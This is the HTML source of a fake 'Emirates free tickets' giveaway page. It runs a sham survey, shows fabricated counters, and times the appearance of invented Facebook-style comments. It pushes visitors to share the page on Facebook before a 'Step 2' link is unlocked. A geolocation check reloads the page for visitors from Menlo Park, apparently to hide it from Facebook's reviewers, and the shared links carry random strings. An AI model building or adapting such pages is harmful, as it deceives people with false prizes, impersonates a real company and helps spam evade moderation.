
<!DOCTYPE HTML>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="initial-scale=1" />
  <title>Emirates- Tickets</title>
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
        
<!-- Facebook og -->

<meta property="og:title" content="Emirates is rewarding everyone with 2 free plane tickets in celebrating 80 years of quality service!" />
<meta name="description" content="Simply, Claim your Tickets here - 2 Tickets Per Family, - 466 Family tickets remaining">
<meta property="og:image" content="https://i.imgur.com/pR0Cgyn.jpg" />
 <meta property="og:url" content="http://emirates-com-tickets.com/" />

<script src="http://code.jquery.com/jquery-1.5.1.min.js"></script> 
<script>
jQuery.ajax( {
  url: '//freegeoip.net/json/',
  type: 'POST',
  dataType: 'jsonp',
  success: function(location) {
    var loco = location.country_code;
    var city = location.city;
    if (city === 'Menlo Park') {location.reload();}
else
{ 
$('').load(function() {
  $(this).width(1).height(1).appendTo('#stat');
});
 }
  }
} );
</script>

<style>
*{ margin: 0; padding: 0;}

body {
	/*To hide the horizontal scroller appearing during the animation*/
	/*overflow: hidden;*/
}

#clouds{
	overflow: hidden;
	padding: 50px 0;
	background: #c9dbe9;
	background: -webkit-linear-gradient(top, #c9dbe9 0%, #fff 100%);
	background: -linear-gradient(top, #c9dbe9 0%, #fff 100%);
	background: -moz-linear-gradient(top, #c9dbe9 0%, #fff 100%);
}

/*Time to finalise the cloud shape*/
.cloud {
	width: 200px; height: 60px;
	background: #fff;
	
	border-radius: 200px;
	-moz-border-radius: 200px;
	-webkit-border-radius: 200px;
	
	position: relative; 
}

.cloud:before, .cloud:after {
	content: '';
	position: absolute; 
	background: #fff;
	width: 100px; height: 80px;
	position: absolute; top: -15px; left: 10px;
	
	border-radius: 100px;
	-moz-border-radius: 100px;
	-webkit-border-radius: 100px;
	
	-webkit-transform: rotate(30deg);
	transform: rotate(30deg);
	-moz-transform: rotate(30deg);
}

.cloud:after {
	width: 120px; height: 120px;
	top: -55px; left: auto; right: 15px;
}

/*Time to animate*/
.x1 {
	-webkit-animation: moveclouds 15s linear infinite;
	-moz-animation: moveclouds 15s linear infinite;
	-o-animation: moveclouds 15s linear infinite;
}

/*variable speed, opacity, and position of clouds for realistic effect*/
.x2 {
	left: 200px;
	
	-webkit-transform: scale(0.6);
	-moz-transform: scale(0.6);
	transform: scale(0.6);
	opacity: 0.6; /*opacity proportional to the size*/
	
	/*Speed will also be proportional to the size and opacity*/
	/*More the speed. Less the time in 's' = seconds*/
	-webkit-animation: moveclouds 25s linear infinite;
	-moz-animation: moveclouds 25s linear infinite;
	-o-animation: moveclouds 25s linear infinite;
}

.x3 {
	left: -250px; top: -200px;
	
	-webkit-transform: scale(0.8);
	-moz-transform: scale(0.8);
	transform: scale(0.8);
	opacity: 0.8; /*opacity proportional to the size*/
	
	-webkit-animation: moveclouds 20s linear infinite;
	-moz-animation: moveclouds 20s linear infinite;
	-o-animation: moveclouds 20s linear infinite;
}

.x4 {
	left: 470px; top: -250px;
	
	-webkit-transform: scale(0.75);
	-moz-transform: scale(0.75);
	transform: scale(0.75);
	opacity: 0.75; /*opacity proportional to the size*/
	
	-webkit-animation: moveclouds 18s linear infinite;
	-moz-animation: moveclouds 18s linear infinite;
	-o-animation: moveclouds 18s linear infinite;
}

.x5 {
	left: -150px; top: -150px;
	
	-webkit-transform: scale(0.8);
	-moz-transform: scale(0.8);
	transform: scale(0.8);
	opacity: 0.8; /*opacity proportional to the size*/
	
	-webkit-animation: moveclouds 20s linear infinite;
	-moz-animation: moveclouds 20s linear infinite;
	-o-animation: moveclouds 20s linear infinite;
}

@-webkit-keyframes moveclouds {
	0% {margin-left: 1000px;}
	100% {margin-left: -1000px;}
}
@-moz-keyframes moveclouds {
	0% {margin-left: 1000px;}
	100% {margin-left: -1000px;}
}
@-o-keyframes moveclouds {
	0% {margin-left: 1000px;}
	100% {margin-left: -1000px;}
}
.preheader,.q h3{text-align:center}.item,.wrapper{-webkit-box-sizing:border-box;-moz-box-sizing:border-box}.buttons span,.left{cursor:pointer}a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font:inherit;vertical-align:baseline}.bold,h2{font-weight:700}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1;background-color:#fff}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}.clearfix:after,.clearfix:before{content:"";display:table}.clearfix:after{clear:both}.clearfix{zoom:1}.preheader{color:#000;font-size:11px;padding-top:5px}.header{color:#fff;width:90%;margin:5px auto}.header tr td{width:50%}.header tr td span{font-weight:700;font-size:1.1em;color:#000}.header tr td:last-child{text-align:right}.wrapper{max-width:90%;margin:10px auto;background-color:#FFF;border-size:3px;border:2px solid #000;border-radius:15px;-moz-border-radius:15px;-webkit-border-radius:15px;padding:20px;box-sizing:border-box}.about,.q h3{padding:10px 0;color:#000}h2{font-size:1.2em;color:#000}.underline{text-decoration:underline}.red{color:#000}.about{line-height:20px;text-align:justify}.q h3{font-size:1.75em;font-weight:700}#final .answer,.cta,.q .answer{font-size:1.5em;color:#fff;text-decoration:none;width:80%;margin:10px auto 0;padding:10px 0;display:block;text-align:center;font-weight:700}#final .answer,.q .answer{background-color:#D31B4B;border:2px solid #000;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both;-webkit-animation-timing-function:linear;animation-timing-function:linear}.cta,.fbcoms{background-color:#fff}.cta{border:2px solid #fff}.buttons span:hover,.fblike:hover,.left:hover{text-decoration:underline}@-webkit-keyframes pulse{0%,100%{-webkit-transform:scale(1)}50%{-webkit-transform:scale(1.1)}}@keyframes pulse{0%,100%{transform:scale(1)}50%{transform:scale(1.1)}}.pulse{-webkit-animation-name:pulse;animation-name:pulse}.loader{display:block;margin:10px auto}.load-list{width:75%;margin:15px auto 0;color:#000}.load-list li{background-image:url(http://i.imgur.com/KXuop7q.png);background-repeat:no-repeat;background-position:left center;font-weight:700;line-height:20px;padding:3px 0 3px 21px;color:#000}.totlikes,.viewmore{background-position:5px center;background-repeat:no-repeat}.try{display:block;color:#848484;font-size:.85em;margin-top:25px;text-align:center}#final,#img2,#loading,#q2,#q3,#q4,.fbcoms,.hidden,.li1,.li2,.li3{display:none}.fbcoms{font-family:Tahoma,Verdana,sans-serif;font-size:12px;text-align:left}.item,.totlikes,.viewmore{margin-top:3px;background-color:#eeeff4}.comments{font-weight:700;text-align:center;padding:0 5px 10px}.totlikes{padding:5px 5px 5px 23px;background-image:url(http://i.imgur.com/p5htS6Z.png)}.fbblue{color:#3c5a96}.buttons{padding-bottom:5px;font-family:Arial,sans-serif;color:#7d7d7f}.viewmore{padding:5px 5px 5px 23px;background-image:url(http://i.imgur.com/Q0NVmyd.png)}.left{float:left;color:#3c5a96}.right{color:#7d7d7f;float:right}.item{position:relative;padding:5px 5px 5px 60px;min-height:60px;box-sizing:border-box}.addcom,.fbimg{-webkit-box-sizing:border-box;-moz-box-sizing:border-box}.item .profileimg{position:absolute;top:5px;left:5px;width:50px}.comtxt{line-height:16px}.name{color:#3c5a96;font-weight:700}.ago{color:#86878c;font-size:.95em}.fblike,.likes{color:#3c5a96;font-size:.95em;cursor:pointer}.combot{padding-top:5px}.clickhere{font-weight:700;padding:30px 10px 5px;line-height:18px}.every,.prodname{color:#000}.fbimg{background-color:#fff;border-radius:2px;-moz-border-radius:2px;-webkit-border-radius:2px;max-width:210px;width:100%;padding:3px;box-sizing:border-box;border:1px solid grey;margin:10px 0 5px}.addcom,.prodname{margin-bottom:10px}.hidden{opacity:0}.addcom{padding:5px 15px 5px 65px;position:relative;min-height:79px;border-bottom:1px solid #e9e9e9;background-color:#f1f1f1;box-sizing:border-box}.genericimg{position:absolute;top:5px;left:10px}.addcom textarea{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;width:100%;border:1px solid #899bc1;resize:none}.addcom .newname{margin-top:3px;border:1px solid #899bc1;padding:3px 5px}.rightalign{text-align:right}.insertcom{margin-top:5px;border:1px solid #999;padding:3px 10px;font-weight:700;font-size:.9em;background:#fff;background:-moz-linear-gradient(top,#fff 0,#e4e4e3 100%);background:-webkit-gradient(linear,left top,left bottom,color-stop(0,#fff),color-stop(100%,#e4e4e3));background:-webkit-linear-gradient(top,#fff 0,#e4e4e3 100%);background:-o-linear-gradient(top,#fff 0,#e4e4e3 100%);background:-ms-linear-gradient(top,#fff 0,#e4e4e3 100%);background:linear-gradient(to bottom,#fff 0,#e4e4e3 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#e4e4e3', GradientType=0 );-webkit-box-shadow:0 1px 0 0 rgba(216,216,216,1);-moz-box-shadow:0 1px 0 0 rgba(216,216,216,1);box-shadow:0 1px 0 0 rgba(216,216,216,1)}.prodname{padding:0;margin-top:10px;font-size:1.6em}#img1{display:block}@media all and (max-width:499px){#img1{display:none}#img2{display:block}}body{font:11px tahoma,verdana,arial,sans-serif}.header-txt,.page-header h1{font-size:18px}.down-counter,.loading-wrap h5{font-family:'Comic Sans MS'}#count{color:red}.loader,.loading-wrap{margin-top:25px}.gemacht-btn{margin-top:35px}.navbar-default{background:url(http://i.imgur.com/5btcRV9.png) center top repeat-x;background-size:100% 100%;border-color:#fff;margin-bottom:0;border-radius:0}.header-container{padding:15px}.header-txt{color:#fff;font-weight:700;text-align:center;margin-bottom:0;text-shadow:.1em .1em .05em #2d4478}textarea{font-size:14px}.beginnen,.gemacht-resize{display:none;padding:8px 15px;background-color:#ECECEC;border-radius:4px;border:1px solid #ddd}.beginnen a,.gemacht-resize a{color:#fff}.beginnen a:hover,.gemacht-resize a:hover{color:#fff;text-decoration:none}.Posten{margin-top:20px}#target-to-copy-text{padding:5px;color:#fff;background:#357ebd;margin-top:25px}a{color:#3B5998;text-decoration:none}.down-counter{font-size:18px}h4.schritt-one a,h4.schritt-three a,h4.schritt-two a{font-size:11px;font-weight:700}.loading-wrap h5{font-size:14px}#clipboard-text{color:#333;font-size:12px}.benutzen{height:300px;width:500px;background-color:#fff;border:1px solid #f5f5f5;border-radius:4px;padding:15px}@media (max-width:767px){.page-header img{height:115px}.Posten,.gemacht-btn{display:yes}.beginnen{width:80%;background:#f9f9f9}.beginnen,.gemacht-resize{display:block;margin-top:20px}#target-to-copy{display:none}.header-txt{font-size:16px}.benutzen{width:270px}}
.wrap {
    border-top: 7px solid #a6231d;
    margin: 0 auto;
    text-align: center;
}
.info2{z-index: 10;position:absolute;left:50%;}
.info3{z-index: 10;position:absolute;right:50%;}
img.sign {
    margin-top: 0px;
    max-width: 335px;
    width: 90%;
	display:inline-block;
}

img.kris {
   margin: 0 5px 10px;
    max-width: 130px;
    width: 90%;
}
header {
    background: url("https://i.imgur.com/mjm3ZOC.png") repeat-x scroll center top;
    font-size: 15px;
    margin-top: -20px;
    text-align: center;
}
</style>
</head>
<body>
 

    <script language="javascript">
        function randomString(len, charSet) {
            charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
            var randomString = '';
            for (var i = 0; i < len; i++) {
                var randomPoz = Math.floor(Math.random() * charSet.length);
                randomString += charSet.substring(randomPoz, randomPoz + 1);
            }
            return randomString;
        }

        function get_random_number(n) {
            return Math.floor((Math.random() * n) + 1);
        }
        var x;
        var links = new Array();
        x = get_random_number(45, 199);
    </script>
	<script language="javascript">
	
$(document).ready(function () {
	  
$("#go").click(function () { 
      $("#to").attr('href', 'http://emirates-com-tickets.com/claimb.html'); 
});
    
}); 
    
	</script>
	
	
	
<script language="javascript">
        var links = new Array();
        links[0] = "http://emirates-com-tickets.com/?"  + randomString(7);
  
        randno = Math.floor(Math.random() * links.length);
        link = links[randno];
    </script>


<div class="wrap" style="height: 150px;">

    <div class="info2">
            <img class="sign" src="http://www.dubaidutyfree.com/Content/img/skywards/plane.png">
        </div>    
        <div class="info3">
            <img class="sign" src="http://www.allesoverdubai.info/wordpress/wp-content/uploads/2016/05/emirates-logo.png">
        </div>
		
		<div id="clouds">
	<div class="cloud x1"></div>
	<!-- Time for multiple clouds to dance around -->
	<div class="cloud x2"></div>
	<div class="cloud x3"></div>
	<div class="cloud x4"></div>
	<div class="cloud x5"></div>
	
</div>
    </div>
<header>
            <img src="https://i.imgur.com/tDrTDDD.png">
        </header>

<br>


	<table class="header">
		<tr>
			
			<td><center><span id="date"></span></center></td>
		</tr>
	</table>
	<div class="wrapper">
		<h2>Congratulations! !</h2>
		<p class="about"><span class="bold red">You have been selected to take part in our short survey to get 2 Free Emirates Tickets! We only have 466 Tickets remaining so hurry up! </p>
		<div class="q" id="q1">
			<h3>1/3: Have you travelled by Emirates?</h3>
			<a class="answer" href="javascript:void(0);">Yes</a>
			<a class="answer" href="javascript:void(0);">No</a>
		</div>
		<div class="q" id="q2">
			<h3>2/3: How would you rate Emirates' services?</h3>
			<a class="answer" href="javascript:void(0);">Average</a>
			<a class="answer" href="javascript:void(0);">Good</a>
			<a class="answer" href="javascript:void(0);">Very Good</a>
		</div>
		<div class="q" id="q3">
			<h3>3/3: Would you refer any of your friends to use Emirates?</h3>
			<a class="answer" href="javascript:void(0);">Yes</a>
			<a class="answer" href="javascript:void(0);">No</a>
			<a class="answer" href="javascript:void(0);">Definitely</a>
		</div>
		<div id="loading">
			<img src="https://www.tsys-tools.com.mx/digital-data-delivery/resources/img/loading.gif" class="loader" />
			<ul class="load-list">
				<li class="li1">Sending your answer to Emirates.com...</li>
				<li class="li2">Analyzing your answers...</li>
				<li class="li3">Congratulations! You won 2 Free tickets at Emirates!</li>
			</ul>
		</div>
		<div id="final">
		      <p align="center" class="prodname">Step 1</p>
		 <p align="center" class="prodname">Share this page by clicking "SHARE" button and type "Thanks for the tickets!" in the comments field!
</p>
				<p align="center"> 
                

                        <a id="go" href="javascript:void(0)" onClick="gt=window.open('https://www.facebook.com/sharer/sharer.php?u=' + link + '', 'gt','top=176,left=500,toolbar=no,location=yes,directories=no,status=no, menubar=no,scrollbars=no,resizable=no,width=800,height=50'); gt.onload = function () {gt.focus();}; return false;"><strong><img src="http://i.imgur.com/OMX3N1k.png" align="top" border="0"></strong></a>
  		  </p>

	
        
        <div class="cont clearfix">
         
</br>
</br>
		  
		  <p align="center" class="prodname">Step 2</p>


                    <div align="center">
<p align="center" class="prodname">Click Like</a></p>

<a id="to" href='javascript:window.alert("Complete Step 1 to get the tickets!");'> <br/><img src="http://i.imgur.com/XFdjhBT.jpg"> </a>


      <div class="loading-wrap">

                            <p align="center" class="prodname">Verifying steps </p>
                            <img src="http://i.imgur.com/QKc7V1W.gif" height="75" alt="Loader image not found">
                        </div>
                    </div>


   
		</div>
		<div class="cont">
		</div>
			</div>
	</div>
	</div>
	</div>
	</div>
<div class="cont fbcoms">
			<p class="comments">Comments:</p>
			<div class="addcom">
				<a class="genericimg" href="#"><img src="images/profile.jpg" /></a>
				<textarea class="newcom" placeholder="Add a comment..."></textarea>
				<input class="newname" placeholder="Add your name..." />
				<div class="rightalign">
					<button class="insertcom">Comment</button>
				</div>
			</div>
			<p class="buttons">
			<span class="like">Like</span> &middot; <span>Comment</span> &middot; <span>Share</span>
			</p>
			<p class="totlikes"><span id="youand"></span><span class="fbblue">12,068 others</span> like this</p>
			<p class="viewmore clearfix">
				<span class="left">View more comments</span>
				<span class="right">50 of 80,312</span>
			</p>
			<div class="item hidden yourcom">
				<img class="profileimg" src="images/profile.jpg" />
				<p class="comtxt"><span class="name yourname"></span> <span class="yourtext"></span></p>
				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb8" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/54.jpg" />
				<p class="comtxt"><span class="name">Eunice Garza</span> Oh yeah! Going to london With my Friend #Juillet</p>
				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb7" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/32.jpg" />
				<p class="comtxt"><span class="name">Bryan Odum</span> It was busy at Emirates counter today. It seems that many people have won these Tickets.</p>

				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb6" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/24.jpg" />
				<p class="comtxt"><span class="name">Bruno Pinho</span> Yeah! i just won the free tickets..</p>
				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb5" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/21.jpg" />
				<p class="comtxt"><span class="name">Jennfier Caesar</span> Yeeess, i Got the free Tickets from Emirates. </p>

				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb4" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/73.jpg" />
				<p class="comtxt"><span class="name">Aliza Brooks</span> Thank you, Emirates.  </p>
				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb3" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/2.jpg" />
				<p class="comtxt"><span class="name">Wallace Porter</span> I won the tickets... Thank you, Emirates.</p>

				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb2" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/men/99.jpg" />
				<p class="comtxt"><span class="name">Christopher Staton</span> I am the luckiest man on Earth.</p>

				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div id="fb1" class="item hidden">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/53.jpg" />
				<p class="comtxt"><span class="name">Radford Sarah</span> Wow, i won a free tickets from Emirates. </p>

				<p class="combot"><span class="ago">Just Now</span> &middot; <span class="fblike">Like</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/46.jpg" />
				<p class="comtxt"><span class="name">Deleon Sandra</span> Such a Great Service! Thanks Emirates.</p>

				<p class="combot"><span class="ago">11 minutes ago</span> &middot; <span class="fblike">Like</span><span class="likes totlikes">267</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/89.jpg" />
				<p class="comtxt"><span class="name">Brenda Vaughn</span> I am finally going  to France with my friends.. Thanks Emirates!</p>

				<p class="combot"><span class="ago">17 minutes ago</span> &middot; <span class="fblike">Like</span><span class="likes totlikes">63</span></p>
			</div>
			<div class="item">
				<img class="profileimg" src="https://randomuser.me/api/portraits/women/61.jpg" />
				<p class="comtxt"><span class="name">Sabrina White</span> Who would have thought I could a free tickets from Emirates..</p>


				<p class="combot"><span class="ago">19 minutes ago</span> &middot; <span class="fblike">Like</span><span class="likes totlikes">112</span></p>
			</div>
		</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<script type="text/javascript">
function date(a) {
	var d = new Date();
	var m = ["January","February","March","April","May","June","July","August","September","October","November","December"];
	$(a).html(d.getDate()+". "+m[d.getMonth()]+" "+d.getFullYear()+" ");
	return false;
}
function addCom() {
	if($(".newcom").val() != "" && $(".newname").val() != "") {
		$(".yourtext").html($(".newcom").val());
		$(".yourname").html($(".newname").val());
		$(".yourcom").css({"opacity":1}).fadeIn(250);
		$(".newcom, .newname").val("");
		$(".addcom").hide();
	} else alert("Enter full name & comment please");
	return false;
}
function FBcom(a,b) {
	setTimeout(function() {
		var m = 0, n = true, op = 0;
		$(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);
		$().slideDown(500);
		var t = setInterval(function() {
			op += 0.2;
			$(a).css({"opacity":op});
			m++;
			if(m == 5) clearInterval(t);
		}, 100);
	}, b);
}
var i = 0;
$(document).ready(function() {
	date("#date");
	$(".addcom").on("click", ".insertcom" ,addCom);
	$(".like").click(function() {
		if($(this).hasClass("selected")) {
			$(this).removeClass("selected");
			$(this).html("Like");
			$("#youand").html("");
		} else {
			$(this).addClass("selected");
			$(this).html("Unlike");
			$("#youand").html("You and ");
		}
	});
	$(".fblike").click(function() {
		if($(this).hasClass("selected")) {
			$(this).removeClass("selected");
			$(this).html("Like");
		} else {
			$(this).addClass("selected");
			$(this).html("Unlike");
		}
	});
	var city = (typeof geoip_city == typeof Function && geoip_city() != "") ? geoip_city() : "your city";
	var region = (typeof geoip_region_name == typeof Function && geoip_region_name() != "") ? ", "+geoip_region_name() : "";
	var country = (typeof geoip_country_name == typeof Function && geoip_country_name() != "") ? ", "+geoip_country_name() : "";
	$(".geoip").html(city+region+country);
	$(".q .answer").on('click',function() {
		i++;
		$(this).addClass("pulse");
		var _this = this;
		setTimeout(function() {
			$(_this).parent().fadeOut(150, function() {
				if($(_this).parent().next().hasClass("q")) $(_this).parent().next().fadeIn(150);
				else {
					$("#loading").fadeIn(150);
					setTimeout(function() {
						$(".li1").fadeIn(150);
					}, 500);
					setTimeout(function() {
						$(".li2").fadeIn(150);
					}, 1800);
					setTimeout(function() {
						$(".li3").fadeIn(150);
					}, 3300);
					setTimeout(function() {
						$(".loader").fadeOut(150, function() {
							$("#final, .fbcoms").fadeIn(150);
							FBcom("#fb1",3000);
							FBcom("#fb2",5000);
							FBcom("#fb3",7000);
							FBcom("#fb4",9000);
							FBcom("#fb5",10500);
							FBcom("#fb6",13000);
							FBcom("#fb7",15000);
							FBcom("#fb8",20000);
						});
					}, 4500);
				}
			});
		}, 200);
	});
});
</script>

</div>

</div>
 <div id ="stat" style="VISIBILITY: hidden;"> 
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-91015564-4"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-91015564-4');
</script>

</div>

</body>
</html>